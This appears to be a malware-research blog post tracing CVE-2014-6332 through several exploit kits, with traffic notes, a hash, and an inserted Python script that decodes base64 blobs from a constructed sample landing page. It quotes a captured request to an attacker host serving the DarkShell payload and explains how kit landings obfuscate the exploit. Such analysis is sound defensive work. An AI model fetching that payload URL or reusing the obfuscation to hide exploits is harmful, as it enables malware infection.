For this CVE, refer to:
The first encounter I had with this CVE in an exploit kit was in Sweet Orange, from the actor pushing DarkShell via compromised KR websites. The landing page provided by @MalwareSigs on 2014-11-19 already contained CVE-2014-6332.
So this actor:
|DarkShell pushed by |
The actor pushing DarkShell with GongDa via KR compromised websites has migrated to Sweet Orange. Somewhat unexpected. pic.twitter.com/rlMy5RsevJ
— kafeine (@kafeine) October 25, 2014
Sweet Orange:
The URL patterns are different, but at any given time the modifications are similar on both...
|Da Orangade firing CVE-2014-6332 and DarkShell Call back |
200 OK (text/html)
|Sweet Orange Landing|
A replace, then a b64decode on the second b64 blob, and we have:
|CVE-2014-6332 in Sweet Orange|
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)
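The "replace, then b64decode" step above is the kind of thing worth scripting when triaging landing pages. The following is an added example, not code from the original post or from any kit: it pulls every quoted base64-looking string out of a constructed sample page, tries a plain decode first, and only falls back to undoing a character swap when plain decoding fails. The swap itself (the kit replaces "c" with "!" in the second blob) is an assumption chosen for the sample, not the substitution Sweet Orange actually used; the sample page and both payload strings are constructed. The last helper flags which decoded blob declares a VBScript block, a cheap triage heuristic given that CVE-2014-6332 is a VBScript engine bug, and mirrors the note that in one capture the exploit sits in the first blob rather than the second.

```python
import base64
import binascii
import re

# Assumed obfuscation (constructed for this sample, not the kit's real one):
# the landing replaces "c" with "!" in the second blob before embedding it.
SWAP_FROM, SWAP_TO = "!", "c"

# Blobs as the sample page embeds them: base64 of two constructed payload
# strings, the second one carrying the swap above.
_FIRST = base64.b64encode(b"<script>// constructed first-stage marker</script>").decode()
_SECOND = base64.b64encode(
    b"<script language=VBScript>' constructed second-stage marker</script>"
).decode().replace(SWAP_TO, SWAP_FROM)

# Constructed stand-in for a landing page with two base64 blobs.
SAMPLE_LANDING = f"""<html><body>
<script>var a="{_FIRST}";document.write(atob(a));</script>
<script>var b="{_SECOND}";document.write(atob(b.replace(/!/g,"c")));</script>
</body></html>"""

# Quoted runs of base64 alphabet (plus the swap character) at least 16 chars long.
BLOB_RE = re.compile(r'"([A-Za-z0-9+/=' + re.escape(SWAP_FROM) + r']{16,})"')


def find_blobs(html):
    """Return the quoted base64-looking strings in page order."""
    return BLOB_RE.findall(html)


def decode_blob(blob, undo_swap=False):
    """Optionally undo the character swap, repair padding, then base64-decode.
    Returns None when the data is not valid base64 (e.g. still obfuscated)."""
    data = blob.replace(SWAP_FROM, SWAP_TO) if undo_swap else blob
    data += "=" * (-len(data) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(data, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def decode_landing(html):
    """Decode every blob; the swap is only tried when plain decoding fails."""
    decoded = []
    for blob in find_blobs(html):
        text = decode_blob(blob)
        if text is None:
            text = decode_blob(blob, undo_swap=True)
        decoded.append(text)
    return decoded


def blobs_with_vbscript(decoded):
    """Indices of decoded blobs that declare a VBScript block."""
    return [i for i, text in enumerate(decoded) if text and "vbscript" in text.lower()]


if __name__ == "__main__":
    for i, text in enumerate(decode_landing(SAMPLE_LANDING)):
        print(i, repr(text))
    print("VBScript in blob(s):", blobs_with_vbscript(decode_landing(SAMPLE_LANDING)))
```

Trying the plain decode first matters: in the ThreatGlass capture the exploit is in the first blob with no swap, so a script that always applies the replace would corrupt that one.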
Here is a more "standard" Sweet Orange:
|CVE-2014-6332 fired by Sweet Orange - And Betabot call back.|
File: You'll find a PCAP illustrating this here
http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)
|Neutrino Firing CVE-2014-6332 embedded in a flash|
Please refer to this post: Neutrino : The come back !
First spotted by Will Metcalf, here is CVE-2014-6332 in Archie
|CVE-2014-6332 - 2014-11-24|
|Flash EK firing CVE-2014-6332 - 2014-12-13|
Edit: 2014-12-21 - Kaspersky named what we were calling Andromedins or AndroKins: Chthonic
NB: it's in RIG and Angler (2015-01-30 for the latter).
Will update asap.
Read More:
Neutrino : The come back ! - 2014-11-20